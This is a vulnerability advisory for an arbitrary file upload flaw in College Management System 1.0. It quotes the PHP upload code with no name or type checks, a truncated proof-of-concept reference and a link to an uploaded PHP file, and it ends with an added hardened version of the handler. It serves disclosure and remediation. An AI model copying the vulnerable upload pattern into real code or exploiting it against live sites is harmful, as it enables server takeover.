Published on October 5th, 2021
College Management System 1.0 Arbitrary File Upload
# Date: 01/10/2021
# Exploit Author: Abdulrahman https://twitter.com/infosec_90
# Vendor Homepage: https://www.eedunext.com/
# Software Link: https://code-projects.org/college-management-system-in-php-with-source-code/
# Version: 1.0
# Tested on: Kali Linux
In Admin/student.php, line 1:
<?php
session_start();
if (!$_SESSION["LoginAdmin"])
{
    // Redirect only: there is no exit after header(), so the script keeps running
    header('location:../login/login.php');
}
require_once "../connection/connection.php";
$_SESSION["LoginStudent"]="";
?>
In Admin/student.php, line 77:
$profile_image = $_FILES['profile_image']['name'];$tmp_name=$_FILES['profile_image']['tmp_name'];$path = "images/".$profile_image;move_uploaded_file($tmp_name, $path);
$matric_certificate = $_FILES['matric_certificate']['name'];$tmp_name=$_FILES['matric_certificate']['tmp_name'];$path = "images/".$matric_certificate;move_uploaded_file($tmp_name, $path);
$fa_certificate = $_FILES['fa_certificate']['name'];$tmp_name=$_FILES['fa_certificate']['tmp_name'];$path = "images/".$fa_certificate;move_uploaded_file($tmp_name, $path);
$ba_certificate = $_FILES['ba_certificate']['name'];$tmp_name=$_FILES['ba_certificate']['tmp_name'];$path = "images/".$ba_certificate;move_uploaded_file($tmp_name, $path);
POC fileupload.html:
<!doctype html>
Link to the uploaded file:
http://127.0.0.1/2/College-Management-System/Admin/images/@infosec_90.php
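
A hardened form of the session check and upload handling shown from Admin/student.php, as an added example (not part of the original advisory and not the project's own code). STORE_DIR, MAX_BYTES, the allow-list and the helper store_upload() are assumptions made for illustration, and the fileinfo extension is assumed to be enabled.

```php
<?php
// Added example: hardened handling for the four upload fields in
// Admin/student.php. STORE_DIR, MAX_BYTES, ALLOWED and store_upload()
// are assumed names, not identifiers from the project.
session_start();
if (empty($_SESSION["LoginAdmin"])) {
    header('Location: ../login/login.php');
    exit; // stop here; the original keeps executing after the redirect
}

const STORE_DIR = '/var/www/uploads';   // assumed path outside the web root
const MAX_BYTES = 2 * 1024 * 1024;      // assumed 2 MB limit per file
// Allowed content types, mapped to the extension the server assigns.
const ALLOWED = [
    'image/jpeg'      => 'jpg',
    'image/png'       => 'png',
    'application/pdf' => 'pdf',
];

function store_upload(string $field): string
{
    $f = $_FILES[$field] ?? null;
    // A non-integer error value means an array upload was sent for this field.
    if ($f === null || !is_int($f['error']) || $f['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException("$field: upload failed");
    }
    if ($f['size'] > MAX_BYTES || !is_uploaded_file($f['tmp_name'])) {
        throw new RuntimeException("$field: rejected");
    }
    // Decide the type from the file's bytes, never from the client's name.
    $mime = (string) (new finfo(FILEINFO_MIME_TYPE))->file($f['tmp_name']);
    if (!array_key_exists($mime, ALLOWED)) {
        throw new RuntimeException("$field: content type not allowed");
    }
    // Server-generated name: no client-controlled extension or path parts.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED[$mime];
    if (!move_uploaded_file($f['tmp_name'], STORE_DIR . '/' . $name)) {
        throw new RuntimeException("$field: could not store file");
    }
    return $name; // save this in the database instead of the original name
}

$stored = [];
foreach (['profile_image', 'matric_certificate', 'fa_certificate', 'ba_certificate'] as $field) {
    $stored[$field] = store_upload($field);
}
```

Because the files are stored outside the web root, they have to be served back through an authenticated script that sets the content type explicitly. If they must stay under Admin/images/, script execution should be disabled for that directory in the web server configuration.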